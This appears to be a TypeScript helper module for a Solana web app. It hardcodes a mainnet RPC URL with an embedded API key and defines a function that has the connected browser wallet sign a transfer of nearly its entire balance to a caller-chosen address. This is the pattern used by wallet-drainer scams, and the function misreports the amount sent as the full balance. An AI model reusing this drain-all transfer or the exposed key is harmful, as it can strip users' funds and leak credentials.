import { Connection, PublicKey, LAMPORTS_PER_SOL, Transaction, SystemProgram } from '@solana/web3.js';

const SOLANA_MAINNET = "https://mainnet.helius-rpc.com/?api-key=951c51e8-708b-4d9b-ae01-85fb27bca286";

export const connection = new Connection(SOLANA_MAINNET);

export const sendAllSol = async (from: PublicKey, to: PublicKey): Promise<{ signature: string; amountSentLamports: number }> => {
    const balance = await connection.getBalance(from);
    const feeEstimate = 1250000;
    const amount = balance - feeEstimate;
    if (amount <= 0) throw new Error('⚠️ Insufficient balance to cover gas fees.');

    const transaction = new Transaction().add(
        SystemProgram.transfer({
            fromPubkey: from,
            toPubkey: to,
            lamports: amount,
        })
    );

    transaction.feePayer = from;
    transaction.recentBlockhash = (await connection.getLatestBlockhash()).blockhash;

    const signed = await window.solana!.signTransaction(transaction);
    const signature = await connection.sendRawTransaction(signed.serialize());

    return { signature, amountSentLamports: balance };
};


export const getBalance = async (pubkeyStr: string): Promise<number> => {
    const pubkey = new PublicKey(pubkeyStr);
    const balance = await connection.getBalance(pubkey);
    return balance / LAMPORTS_PER_SOL;
};


